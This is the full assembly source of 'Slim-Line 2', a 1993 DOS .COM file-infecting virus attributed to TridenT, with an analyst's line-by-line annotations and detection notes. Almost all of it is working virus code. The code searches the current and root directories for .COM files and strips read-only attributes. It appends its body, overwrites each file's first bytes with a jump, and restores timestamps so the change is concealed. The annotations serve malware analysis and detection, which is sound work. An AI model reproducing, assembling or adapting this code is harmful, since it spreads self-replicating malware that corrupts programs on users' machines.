- ; Analyst annotation: 16-bit real-mode DOS .COM image (ORG 100h), MASM/TASM-style Intel syntax; all file access goes through INT 21h.
- ; The Slim-Line 2 virus, from the Slim-line virus collection.
- ; (C) 1993 by [DαRkRαY]/TridenT
- ; Behaviour visible in this listing: it searches *.COM in the current directory and then in the root directory, appends LAST - VX bytes to each file that is not already marked, and overwrites that file's first four bytes with 'D', 0E9h and a 16-bit jump displacement.
- ; And this time it's a direct action COM infector.
- ; <will be commented soon>
- ; Detection notes: a modified file starts with the bytes 44h 0E9h and ends with a body holding the plaintext strings at FIND, MARKER, NAMED and COUNTRY; attributes and the date/time stamp are restored after the write, so neither reveals the change -- compare file size or a content hash instead.
- _CODE SEGMENT
- ASSUME CS:_CODE, DS:_CODE, ES:_CODE          ; tells the assembler CS, DS and ES all address _CODE
- ORG 100h                                    ; .COM load offset
- ; Four-byte entry stub: the byte 'D' followed by a near JMP opcode (0E9h) with displacement 0, which lands on VX.
- FIRST:
- DB 'D', 0E9h, 000h, 000h                    ; the same 'D', 0E9h pair is what the marker check below looks for
- ; Body start. BP is the base added to every data reference below; it is 0 in this stand-alone build.
- VX:
- MOV BP,00000h
- ; Copy the four saved bytes at OLD_4_BYTES to offset 100h, and push 100h as the address the final RET will use.
- LEA SI,[BP + OLD_4_BYTES]                   ; source = saved first four bytes
- MOV DI,00100h                               ; destination = program start
- PUSH DI                                     ; return address for the RET at EXIT
- MOV CX,DI                                   ; CX = 100h, byte count for the backup copy below
- MOVSW
- MOVSW                                       ; 2 x 2 bytes copied
- ; Back up offsets 0..0FFh of the segment (the PSP of a .COM program, including the default DTA at 80h) to LAST + 2.
- XOR SI,SI                                   ; source = offset 0
- LEA DI,[BP + LAST + 2]                      ; destination = scratch area just past the body
- PUSH SI                                     ; these three values are popped at EXIT,
- PUSH DI                                     ; where source and destination end up swapped
- PUSH CX                                     ; so the same REP MOVSB copies the backup back
- REP MOVSB                                   ; leaves CX = 0
- ; Directory search: first match here, following matches by re-entering at AGAIN with AH = 4Fh.
- FIND_FILE:
- MOV AH,04Eh                                 ; INT 21h find-first
- LEA DX,[BP + FIND]                          ; file specification "*.COM"
- MOV CL,27h                                  ; attribute mask low byte: read-only, hidden, system, archive
- AGAIN:
- INT 021h
- JC GO_ROOT                                  ; carry set = no (more) matches
- ; Per-file handling. DX = 9Eh is the file-name field of the default DTA (80h + 1Eh) filled in by the search call.
- YES_FILE:
- MOV AX,04300h                               ; get file attributes
- MOV DX,09Eh
- INT 021h
- PUSH CX                                     ; keep the original attributes for the restore below
-
- MOV AX,04301h                               ; set file attributes ...
- XOR CX,CX                                   ; ... to 0, which clears read-only
- INT 021h
-
- MOV AX,03D02h                               ; open read/write (DX still 9Eh); the result is not checked for errors
- INT 021h
- XCHG AX,BX                                  ; BX = file handle for all calls that follow
-
-
- MOV AX,05700h                               ; get file date/time stamp
- INT 021h
- PUSH CX                                     ; time
- PUSH DX                                     ; date
-
- MOV AH,03Fh                                 ; read ...
- MOV CX,004h                                 ; ... the first four bytes of the file ...
- LEA DX,[BP + OLD_4_BYTES]                   ; ... into the save slot
- INT 021h
-
- MOV SI,DX
- LODSW                                       ; AX = first two bytes just read
- CMP AX,0E944h                               ; bytes 44h ('D'), 0E9h in file order = already marked
- JE DONT_INFECT
- ; Not marked: seek to end of file; AX then holds the low word of the file length.
- MOV AL,02h                                  ; seek origin = end of file
- CALL SET_POINTER
-
- SUB AX,00004h                               ; length - 4 = displacement from offset 104h to the appended body
- MOV WORD PTR [BP + VX + 2],AX               ; self-modifying store into the body at VX + 2 before it is written out
- MOV WORD PTR [BP + NEW_4_BYTES + 2],AX      ; displacement word that follows the two data bytes at NEW_4_BYTES (i.e. at LAST)
-
- MOV AH,040h                                 ; write ...
- MOV CL,(LAST - VX)                          ; ... LAST - VX bytes (CH is 0 from SET_POINTER) ...
- LEA DX,[BP + VX]                            ; ... starting at VX, at the current (end-of-file) position
- INT 021h
-
- XOR AX,AX                                   ; AL = 0: seek origin = start of file
- CALL SET_POINTER
-
- MOV AH,040h                                 ; write ...
- MOV CL,004h                                 ; ... four bytes ...
- LEA DX,[BP + NEW_4_BYTES]                   ; ... 'D', 0E9h, displacement word, over the file's first four bytes
- INT 021h
- ; Common tail for every file: restore date/time, close, restore attributes, continue the search.
- DONT_INFECT:
- MOV AX,05701h                               ; set file date/time stamp to the saved values
- POP DX
- POP CX
- INT 021h
-
- MOV AH,03Eh                                 ; close handle BX
- INT 021h
-
- MOV AX,04301h                               ; set file attributes back to the saved value
- POP CX
- MOV DX,09Eh
- INT 021h
-
- MOV AH,4Fh                                  ; INT 21h find-next
- JMP AGAIN
-
- GO_ROOT:
- ; No (more) matches: change to the root directory and run the search again.
- MOV AH,03Bh                                 ; change current directory
- LEA DX,[BP + ROOT]                          ; path "\"
- INT 021h
- JC EXIT                                     ; EXIT is reached only when this call reports an error
- JMP FIND_FILE
- ; Copy the 100h-byte backup from LAST + 2 back to offsets 0..0FFh, then return to offset 100h (pushed at the start).
- EXIT:
- POP CX                                      ; 100h
- POP SI                                      ; offset of the backup (pushed from DI)
- POP DI                                      ; 0 (pushed from SI)
- REP MOVSB
-
- RET                                         ; pops the 100h pushed after VX
- ; SET_POINTER: INT 21h AH=42h seek on handle BX. In: AL = origin (0 start, 2 end). Offset CX:DX = 0. Out: DX:AX = new position. Clobbers CX, DX.
- SET_POINTER:
- MOV AH,042h
- XOR CX,CX                                   ; high word of offset = 0
- CWD                                         ; DX = sign extension of AX = 0, because AH = 42h
- INT 021h
- RET
- ; Four-byte save slot for a file's original first bytes; NOP/NOP/NOP/RET is its content in this stand-alone build.
- OLD_4_BYTES: NOP
- NOP
- NOP
- RET
- ; Data. FIND and ROOT are the only strings the code references; CUT, MARKER, NAMED and COUNTRY are unreferenced plaintext.
- FIND DB "*.COM", 000h
- ROOT DB "\", 000h
-
- CUT DB ""
- MARKER DB "[DR/TridenT]"
- NAMED DB "Slim-Line 2 v0.9ß"
- COUNTRY DB "Holland"
- NEW_4_BYTES DB 'D', 0E9h                    ; first two of the four bytes written to file offset 0; the displacement word is stored at LAST
- LAST:                                       ; end of the written body; LAST + 2 onward is scratch for the 100h-byte backup
-
- _CODE ENDS
- END FIRST
-